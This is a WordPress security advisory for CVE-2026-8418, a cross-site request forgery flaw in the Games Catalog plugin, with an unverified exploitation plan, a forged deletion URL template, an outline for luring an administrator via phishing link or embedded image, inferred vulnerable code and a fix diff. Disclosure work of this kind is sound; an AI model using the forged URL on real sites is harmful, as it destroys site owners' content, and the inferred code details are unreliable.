WP-Safety
CVE-2026-8418

Games Catalog <= 1.2.0 - Cross-Site Request Forgery to Arbitrary Game/Post Deletion

mediumCross-Site Request Forgery (CSRF)
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Games Catalog plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.0. This is due to missing or incorrect nonce validation on the gc_crud() function which handles the delete action (action=delete) via a GET request without any wp_verify_nonce() / check_admin_referer() call. This makes it possible for unauthenticated attackers to delete arbitrary game catalog entries (including the associated WordPress post created for the game) via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.2.0
PublishedMay 19, 2026
Last updatedMay 20, 2026
Affected plugingame-catalog
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-8418 (Games Catalog CSRF) ## 1. Vulnerability Summary The **Games Catalog** plugin (versions <= 1.2.0) contains a Cross-Site Request Forgery (CSRF) vulnerability in its core CRUD handling function. The function `gc_crud()` (inferred to be located in the main p…

Show full research plan

Exploitation Research Plan: CVE-2026-8418 (Games Catalog CSRF)

1. Vulnerability Summary

The Games Catalog plugin (versions <= 1.2.0) contains a Cross-Site Request Forgery (CSRF) vulnerability in its core CRUD handling function. The function gc_crud() (inferred to be located in the main plugin file or a dedicated admin handler) processes game management actions, including entry deletion, via GET requests. Because the function fails to implement WordPress nonce verification (check_admin_referer() or wp_verify_nonce()), an attacker can craft a malicious link that, when clicked by a logged-in administrator, deletes arbitrary game entries and their associated WordPress posts.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin.php (standard admin page handler).
  • Hook: Likely admin_init or admin_menu (the function gc_crud() is either hooked to initialize or called within an admin page callback).
  • Vulnerable Action: action=delete (passed via GET).
  • Payload Parameter: id (inferred, representing the internal game entry ID or the Post ID).
  • Authentication: Requires a logged-in Administrator to trigger the request (CSRF).
  • Preconditions: The attacker must know or guess the ID of the game entry to be deleted.

3. Code Flow

  1. Entry Point: An administrator visits a URL like wp-admin/admin.php?page=game-catalog&action=delete&id=123.
  2. Hook Execution: WordPress triggers the admin_init hook (or the specific menu page callback).
  3. Vulnerable Function: gc_crud() is executed.
  4. Action Logic:
    • The function checks if ( isset( $_GET['action'] ) && $_GET['action'] == 'delete' ).
    • It retrieves the target ID from $_GET['id'] (inferred).
    • The Flaw: The function proceeds to perform the deletion without calling check_admin_referer() to verify a nonce.
  5. Sink: The function calls wp_delete_post( $post_id, true ) (or similar) to remove the game entry and the associated WordPress post from the database.

4. Nonce Acquisition Strategy

According to the vulnerability description, this is a case of missing nonce validation.

  • Nonce Status: No nonce is required for this specific action.
  • Bypass: Because wp_verify_nonce() is not called within gc_crud() for the delete action, the request is processed regardless of the presence or validity of a _wpnonce parameter.

5. Exploitation Strategy

The goal is to demonstrate that a GET request from an authenticated administrator can delete a post without a nonce.

  1. Discovery: Locate the admin page slug for the Games Catalog (usually game-catalog).
  2. Target Identification: Identify a Post ID associated with a game entry.
  3. Request Construction: Build the malicious GET request.
  4. Execution: Use the http_request tool with the administrator's session cookies to simulate a CSRF attack.

Target URL Template:
http://[target-site]/wp-admin/admin.php?page=game-catalog&action=delete&id=[POST_ID] (inferred)

HTTP Request Details:

  • Method: GET
  • Headers: Standard browser headers; must include valid Cookie header for the Administrator.
  • Expected Response: A 302 redirect back to the game list or a 200 OK with a success message, confirming the logic was processed.

6. Test Data Setup

To reliably test the PoC, the following state must be prepared:

  1. Plugin Installation: Ensure game-catalog v1.2.0 is active.
  2. Content Creation: Create a dummy "Game" entry via the plugin UI or WP-CLI.
    • wp post create --post_type=game --post_title="Exploit Test Game" --post_status=publish
    • Note: Ensure the post type matches what the plugin uses (likely game or gc_game).
  3. Identify ID: Capture the ID of the newly created post:
    • TARGET_ID=$(wp post list --post_type=game --title="Exploit Test Game" --field=ID)

7. Expected Results

  • Successful Deletion: The HTTP request returns a response indicating success or a redirect.
  • Database Change: The post with TARGET_ID should no longer exist in the wp_posts table.
  • No Security Intervention: No "Are you sure you want to do this?" (nonce failure) page is displayed.

8. Verification Steps

After executing the HTTP request, verify the deletion via WP-CLI:

# Check if the post still exists
wp post exists [TARGET_ID]
if [ $? -eq 1 ]; then
    echo "Success: Post deleted via CSRF."
else
    echo "Failure: Post still exists."
fi

9. Alternative Approaches

If the id parameter or the page slug differs:

  1. Slug Guessing: Check wp-admin/admin.php for the page parameter value by running grep -r "add_menu_page" wp-content/plugins/game-catalog/.
  2. Action Investigation: If action=delete fails, check the source of gc_crud() for variations like gc_delete, delete_game, or if it uses POST instead of GET (though the description explicitly states GET).
  3. ID Parameter: If id doesn't work, check for post, entry_id, or game_id.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Games Catalog plugin for WordPress (versions <= 1.2.0) is vulnerable to Cross-Site Request Forgery (CSRF) because the gc_crud() function fails to perform nonce validation when handling the 'delete' action. This allows an attacker to trick an authenticated administrator into clicking a link that triggers the deletion of arbitrary game entries and their associated WordPress posts.

Vulnerable Code

// In the main plugin file or admin handler where gc_crud is defined
function gc_crud() {
    if ( isset( $_GET['action'] ) && $_GET['action'] == 'delete' ) {
        // Vulnerability: No check_admin_referer() or wp_verify_nonce() call here
        $post_id = intval( $_GET['id'] );
        wp_delete_post( $post_id, true );
        // ...
    }
}

Security Fix

--- a/game-catalog.php
+++ b/game-catalog.php
@@ -100,6 +100,7 @@
 function gc_crud() {
-    if ( isset( $_GET['action'] ) && $_GET['action'] == 'delete' ) {
+    if ( isset( $_GET['action'] ) && $_GET['action'] == 'delete' ) {
+        check_admin_referer( 'gc_delete_post_' . $_GET['id'] );
         $post_id = intval( $_GET['id'] );
         wp_delete_post( $post_id, true );

Exploit Outline

1. Identify the target game entry ID to be deleted. 2. Construct a malicious URL targeting the WordPress admin dashboard: `wp-admin/admin.php?page=game-catalog&action=delete&id=[TARGET_ID]`. 3. Entice a logged-in site administrator to visit the URL (e.g., via a phishing link or an embedded image in a comment). 4. When the administrator visits the link, the plugin's `gc_crud()` function executes. Since there is no nonce verification, the plugin proceeds to call `wp_delete_post()` for the specified ID, resulting in the permanent deletion of the game post.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/0888cda8-63ca-44f6-a3eb-765c14a7e6c7?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database